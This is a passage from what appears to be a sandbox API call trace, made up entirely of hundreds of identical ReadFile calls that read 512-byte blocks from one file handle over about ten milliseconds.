lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.335] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.335] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.335] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, 
lpOverlapped=0x0) returned 1 [0151.335] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.336] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.336] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.336] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.336] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.336] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.336] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.336] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.336] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, 
lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.336] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.336] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.337] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.337] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.337] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.337] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.337] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.337] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.337] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: 
lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.337] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.337] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.337] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.338] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.338] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.338] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.338] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.338] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.338] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, 
lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.338] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.338] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.338] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.338] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.339] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.339] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.339] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.339] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.339] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.339] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.339] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.339] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.339] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.339] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.340] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.340] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.340] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.340] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.340] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.340] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.340] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.340] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.340] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.340] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.340] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.341] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.341] ReadFile (in: hFile=0x58, 
lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.341] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.341] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.341] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.341] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.341] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.341] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.341] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.342] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.342] ReadFile 
(in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.342] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.342] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.342] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.342] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.342] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.342] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.342] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.342] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 
[0151.342] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.343] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.343] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.343] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.343] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.343] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.343] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.343] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.343] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, 
lpOverlapped=0x0) returned 1 [0151.343] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.343] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.343] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.344] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.344] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.344] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.344] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.344] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.344] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, 
lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.344] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.344] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.344] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.345] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.345] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.345] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.345] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.345] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.345] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: 
lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.345] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.345] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.345] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.345] ReadFile (in: hFile=0x58, 